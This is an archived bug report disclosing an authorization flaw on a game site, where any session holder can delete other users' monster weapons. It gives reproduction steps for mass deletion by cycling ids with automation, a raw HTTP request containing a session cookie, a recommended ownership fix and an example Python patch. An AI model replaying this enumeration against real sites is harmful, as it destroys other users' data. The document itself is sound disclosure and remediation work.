This repository was archived by the owner on Jul 4, 2023. It is now read-only.
Capture the packet sent by clicking the Delete button next to an enemy on the right sidebar (shown below).
Change the enemy weapon id (§§ in the example packet) to an arbitrary number, or a particular one if you happen to have a particular enemy weapon in mind and know its id.
Use automation software to submit packets cycling through monster ids from 1 to 1000 (or however high one prefers) to effect mass deletion.
Impact:
Any user with a valid session cookie can delete any monster from the database, regardless of ownership and privacy settings.
Steps to reproduce:
POST /deletemonsterweapon/§§ HTTP/1.1
Host: www.compoundx.org
Connection: close
Content-Length: 0
Cache-Control: max-age=0
Origin: https://www.compoundx.org
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://www.compoundx.org/monsterweapons
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=.eJyrVorQdQ4OclOyqlZSSFKyUorKtTRJ8fAqS3G0tVWq1VFKySwuyEmszEvMTYWrCc51K4mK8AXLF-XnICRC3SsyUsPDKkESpcWpRSi6wjzCKlPcK3KS3C0ro8Cm1wIAWVwmqQ.ESuGcw.YPWCofLDLiYauvgHjieBj5b7FfE
Recommended fix:
Adding in permissions that disallow (non-admin) users from deleting enemy weapons that they did not make would prevent a bad actor with a single (non-admin) cookie from deleting enemy weapons owned by other users.
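One way to implement the ownership check recommended above, shown beside the unchecked behaviour the report describes. This is an added example, not code from the project: the `monster_weapons` table, its `owner_id` column, the `user` dict and all function names are assumptions, and the sample rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data: user 10 owns weapons 1 and 2, user 20 owns weapon 3.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE monster_weapons "
               "(id INTEGER PRIMARY KEY, owner_id INTEGER NOT NULL, name TEXT)")
    db.executemany("INSERT INTO monster_weapons VALUES (?, ?, ?)",
                   [(1, 10, "claw"), (2, 10, "bite"), (3, 20, "tail")])
    return db

def delete_weapon_unchecked(db, user, weapon_id):
    # Behaviour described in the report: a valid session is the only
    # requirement, so the id in the URL alone decides what is deleted.
    cur = db.execute("DELETE FROM monster_weapons WHERE id = ?", (weapon_id,))
    return 200 if cur.rowcount else 404

def delete_weapon_checked(db, user, weapon_id):
    # The owner comes from the server-side session, never from the request.
    # Ownership is part of the DELETE itself, so there is no gap between
    # "check owner" and "delete row".
    if user["is_admin"]:
        cur = db.execute("DELETE FROM monster_weapons WHERE id = ?",
                         (weapon_id,))
    else:
        cur = db.execute(
            "DELETE FROM monster_weapons WHERE id = ? AND owner_id = ?",
            (weapon_id, user["id"]))
    # One status for "no such id" and "not yours", so responses do not
    # reveal which ids belong to other users.
    return 200 if cur.rowcount else 404

def remaining_after(delete_fn, user, ids):
    # Regression check: apply one user's delete requests for every id in
    # `ids` to a fresh database and return the ids that survive.
    db = make_db()
    for weapon_id in ids:
        delete_fn(db, user, weapon_id)
    return [row[0] for row in
            db.execute("SELECT id FROM monster_weapons ORDER BY id")]

if __name__ == "__main__":
    other_user = {"id": 20, "is_admin": False}
    print(remaining_after(delete_weapon_unchecked, other_user, range(1, 1001)))
    print(remaining_after(delete_weapon_checked, other_user, range(1, 1001)))
```
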